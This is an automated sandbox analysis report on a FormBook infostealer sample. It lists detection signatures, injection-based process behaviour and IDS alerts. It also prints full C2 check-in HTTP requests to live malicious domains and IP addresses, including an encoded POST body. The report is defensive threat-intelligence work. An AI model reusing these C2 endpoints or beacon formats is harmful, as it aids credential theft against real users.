Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BcF3o0Egke.exe

Overview

General Information

Sample name:BcF3o0Egke.exe
renamed because original name is a hash value
Original sample name:c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5.exe
Analysis ID:1588352
MD5:a04f2271ad163c1098d3ca9c311b53d0
SHA1:4c3b52a43f8a0d4e29ab25342bd6cb19d4eb8442
SHA256:c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • BcF3o0Egke.exe (PID: 432 cmdline: "C:\Users\user\Desktop\BcF3o0Egke.exe" MD5: A04F2271AD163C1098D3CA9C311B53D0)
    • BcF3o0Egke.exe (PID: 3780 cmdline: "C:\Users\user\Desktop\BcF3o0Egke.exe" MD5: A04F2271AD163C1098D3CA9C311B53D0)
    • BcF3o0Egke.exe (PID: 6020 cmdline: "C:\Users\user\Desktop\BcF3o0Egke.exe" MD5: A04F2271AD163C1098D3CA9C311B53D0)
      • ysdBLufRFxAq.exe (PID: 3628 cmdline: "C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 1436 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • ysdBLufRFxAq.exe (PID: 1240 cmdline: "C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5564 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.BcF3o0Egke.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              5.2.BcF3o0Egke.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:21:36.133088+010028554651A Network Trojan was detected192.168.2.54992674.48.143.8280TCP
                2025-01-11T01:21:59.620368+010028554651A Network Trojan was detected192.168.2.54998698.124.224.1780TCP
                2025-01-11T01:22:13.564360+010028554651A Network Trojan was detected192.168.2.549992103.21.221.480TCP
                2025-01-11T01:22:27.188683+010028554651A Network Trojan was detected192.168.2.549996154.23.184.9580TCP
                2025-01-11T01:22:40.757797+010028554651A Network Trojan was detected192.168.2.55000088.198.8.15080TCP
                2025-01-11T01:22:54.253500+010028554651A Network Trojan was detected192.168.2.550004104.21.15.10080TCP
                2025-01-11T01:23:08.749323+010028554651A Network Trojan was detected192.168.2.55000846.253.5.22180TCP
                2025-01-11T01:23:22.454501+010028554651A Network Trojan was detected192.168.2.550012107.167.84.4280TCP
                2025-01-11T01:23:35.768253+010028554651A Network Trojan was detected192.168.2.550016209.74.77.10980TCP
                2025-01-11T01:23:49.286429+010028554651A Network Trojan was detected192.168.2.550020199.59.243.22880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T01:21:51.982055+010028554641A Network Trojan was detected192.168.2.54998398.124.224.1780TCP
                2025-01-11T01:21:54.551598+010028554641A Network Trojan was detected192.168.2.54998498.124.224.1780TCP
                2025-01-11T01:21:57.091724+010028554641A Network Trojan was detected192.168.2.54998598.124.224.1780TCP
                2025-01-11T01:22:05.824627+010028554641A Network Trojan was detected192.168.2.549989103.21.221.480TCP
                2025-01-11T01:22:08.468232+010028554641A Network Trojan was detected192.168.2.549990103.21.221.480TCP
                2025-01-11T01:22:11.010341+010028554641A Network Trojan was detected192.168.2.549991103.21.221.480TCP
                2025-01-11T01:22:19.565335+010028554641A Network Trojan was detected192.168.2.549993154.23.184.9580TCP
                2025-01-11T01:22:22.100779+010028554641A Network Trojan was detected192.168.2.549994154.23.184.9580TCP
                2025-01-11T01:22:24.662402+010028554641A Network Trojan was detected192.168.2.549995154.23.184.9580TCP
                2025-01-11T01:22:32.998843+010028554641A Network Trojan was detected192.168.2.54999788.198.8.15080TCP
                2025-01-11T01:22:35.540625+010028554641A Network Trojan was detected192.168.2.54999888.198.8.15080TCP
                2025-01-11T01:22:38.065591+010028554641A Network Trojan was detected192.168.2.54999988.198.8.15080TCP
                2025-01-11T01:22:46.353678+010028554641A Network Trojan was detected192.168.2.550001104.21.15.10080TCP
                2025-01-11T01:22:48.949043+010028554641A Network Trojan was detected192.168.2.550002104.21.15.10080TCP
                2025-01-11T01:22:51.624941+010028554641A Network Trojan was detected192.168.2.550003104.21.15.10080TCP
                2025-01-11T01:23:00.101751+010028554641A Network Trojan was detected192.168.2.55000546.253.5.22180TCP
                2025-01-11T01:23:03.649453+010028554641A Network Trojan was detected192.168.2.55000646.253.5.22180TCP
                2025-01-11T01:23:06.191305+010028554641A Network Trojan was detected192.168.2.55000746.253.5.22180TCP
                2025-01-11T01:23:14.813377+010028554641A Network Trojan was detected192.168.2.550009107.167.84.4280TCP
                2025-01-11T01:23:17.364167+010028554641A Network Trojan was detected192.168.2.550010107.167.84.4280TCP
                2025-01-11T01:23:19.915817+010028554641A Network Trojan was detected192.168.2.550011107.167.84.4280TCP
                2025-01-11T01:23:28.090531+010028554641A Network Trojan was detected192.168.2.550013209.74.77.10980TCP
                2025-01-11T01:23:30.652089+010028554641A Network Trojan was detected192.168.2.550014209.74.77.10980TCP
                2025-01-11T01:23:33.179816+010028554641A Network Trojan was detected192.168.2.550015209.74.77.10980TCP
                2025-01-11T01:23:41.311917+010028554641A Network Trojan was detected192.168.2.550017199.59.243.22880TCP
                2025-01-11T01:23:43.896436+010028554641A Network Trojan was detected192.168.2.550018199.59.243.22880TCP
                2025-01-11T01:23:46.408936+010028554641A Network Trojan was detected192.168.2.550019199.59.243.22880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: BcF3o0Egke.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7UvfAvira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/Avira URL Cloud: Label: malware
                Source: http://www.cssa.auction/rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: BcF3o0Egke.exeVirustotal: Detection: 70%Perma Link
                Source: BcF3o0Egke.exeReversingLabs: Detection: 95%
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: BcF3o0Egke.exeJoe Sandbox ML: detected
                Source: BcF3o0Egke.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BcF3o0Egke.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: GpHAn.pdb source: BcF3o0Egke.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ysdBLufRFxAq.exe, 00000006.00000000.2366003816.000000000070E000.00000002.00000001.01000000.0000000C.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2522895331.000000000070E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BcF3o0Egke.exe, BcF3o0Egke.exe, 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2448577877.0000000003450000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2445542520.00000000032A4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: GpHAn.pdbSHA256 source: BcF3o0Egke.exe
                Source: Binary string: regini.pdb source: BcF3o0Egke.exe, 00000005.00000002.2441514476.00000000010F7000.00000004.00000020.00020000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000002.3935408819.0000000001358000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E1C8D0 FindFirstFileW,FindNextFileW,FindClose,7_2_02E1C8D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax7_2_02E09E40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h7_2_039504D8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49926 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 46.253.5.221:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 98.124.224.17:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 103.21.221.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 88.198.8.150:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 209.74.77.109:80
                Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: BTEL-BG-ASBG BTEL-BG-ASBG
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /p8wp/?e6sH8=XBEmzwHL3IPy9fzNy+mt0a1h64egiA/nosfb/2OhlZZwotDgHxcXOtzA1prhF0ec+MC5UU6vEfUJUDhxTQZrnkRY0wlRdLQOsYcJNWRSxCeXfXL0akVDuIK46RTRxpICeg==&rr=BbldmNsp8 HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /47f1/?e6sH8=BO3MRbup7BgeiGzbrkvG8KshvKs5D/C7iISXRLSPWIyfeIsyuuk5G38k05LUc3hMRb3xwauQUaAEJYhYNzVT8CpTp0QkkBq1y4sNZ2ldFAdykoca83krEGIrLt+evp31gA==&rr=BbldmNsp8 HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4iun/?rr=BbldmNsp8&e6sH8=WRIrWbi0RdvATvg+JEodCsmxHRk8nC/+xgGLR7bozazeHzvdprVUl2vczsb3bYqlYyiGziBj+UW2kzFAiywpuauCK8BCe9zqr6jRwciKumWtZPYXukZtwjz9MdHPx1eFIw== HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /lazq/?e6sH8=WtUPWIBoeWip1ayhwxY4grkqBqE3elVyJELTKTyKd72UqlXqOtyJmls3NLQwFRx/IHhzkpCNBmP7jtEA+bMkVVX0RGb+5s2kSkhaf40FF0423J1jVorSDRX3Mt1+1Y+N0g==&rr=BbldmNsp8 HTTP/1.1Host: www.hm35s.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /2lci/?rr=BbldmNsp8&e6sH8=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNCiHfOCZyv1qYWJ1bwu2fvFY8APk0KaeRNG0Pv4PAhLvZA== HTTP/1.1Host: www.snehasfashion.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /s7xt/?e6sH8=KIYGkFEpkLb5U9Z0/G2nYgR5FDZ6UiRQBMLs0+U/kh62mYb3aiLe2OdUmDxpEW63W2KDnmcIAZHjnyCR3mqA9TJ417GC4aJAohl/0/HIB1aq1+GW1q6O2aRbrP6PH2e8rA==&rr=BbldmNsp8 HTTP/1.1Host: www.sitioseguro.blogAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /gybb/?rr=BbldmNsp8&e6sH8=hA00v1ZIgX8EW+F3rWYc/zQviV8zTY6oC8gLC3V041/hGU+ZZxjILTR8UNm+bxrYgj9XtAZ4lfteOYOwyHEO4IQcXwxluILOpqvLxjlac2zTW2ZjXnd6ITs8lfiKZkyKwA== HTTP/1.1Host: www.windsky.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rjvg/?e6sH8=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6MmyEpVR/4xibFk7xqZoKGfmGxLdx1ruWl0EgkmHv/8jyFg==&rr=BbldmNsp8 HTTP/1.1Host: www.cssa.auctionAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /4r26/?e6sH8=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80etZ5Cy+PRwnxMf10/xPOo/zDftN59BIXLil1jV1mDemi+A==&rr=BbldmNsp8 HTTP/1.1Host: www.moviebuff.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficHTTP traffic detected: GET /rfcw/?e6sH8=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg87VqMj4zR8JAo57t+O519z31L6J8d3g4D3wlhoIiupxBhw==&rr=BbldmNsp8 HTTP/1.1Host: www.whisperart.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.bookingservice.center
                Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini06.click
                Source: global trafficDNS traffic detected: DNS query: www.hm35s.top
                Source: global trafficDNS traffic detected: DNS query: www.snehasfashion.shop
                Source: global trafficDNS traffic detected: DNS query: www.sitioseguro.blog
                Source: global trafficDNS traffic detected: DNS query: www.windsky.click
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.moviebuff.info
                Source: global trafficDNS traffic detected: DNS query: www.whisperart.net
                Source: unknownHTTP traffic detected: POST /47f1/ HTTP/1.1Host: www.bookingservice.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.bookingservice.centerContent-Length: 206Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.bookingservice.center/47f1/User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0Data Raw: 65 36 73 48 38 3d 4d 4d 66 73 53 74 61 41 77 79 31 44 69 58 54 53 6b 47 53 56 33 75 67 4f 72 2f 70 6f 47 4c 43 6f 79 76 75 56 53 71 48 55 48 35 4b 6e 52 59 34 4a 39 76 63 35 43 30 67 67 6f 34 50 77 58 58 78 2f 51 2f 2f 41 37 36 48 42 4d 66 56 68 47 70 45 30 44 43 74 31 35 56 49 49 73 48 59 38 2f 51 53 77 2b 4a 4d 52 5a 30 78 63 4f 43 56 63 6d 70 63 72 39 6b 39 43 44 55 45 66 63 6f 61 39 6c 59 57 50 78 58 6a 51 7a 36 31 64 54 69 57 73 69 57 2f 31 4a 74 48 73 72 64 73 44 71 56 42 64 77 4b 6d 44 58 71 73 66 47 61 5a 65 71 42 5a 50 76 41 6b 59 6b 63 58 39 4d 46 69 5a 48 6f 51 46 41 55 34 4d 63 71 6d 53 6b 70 6f 3d Data Ascii: 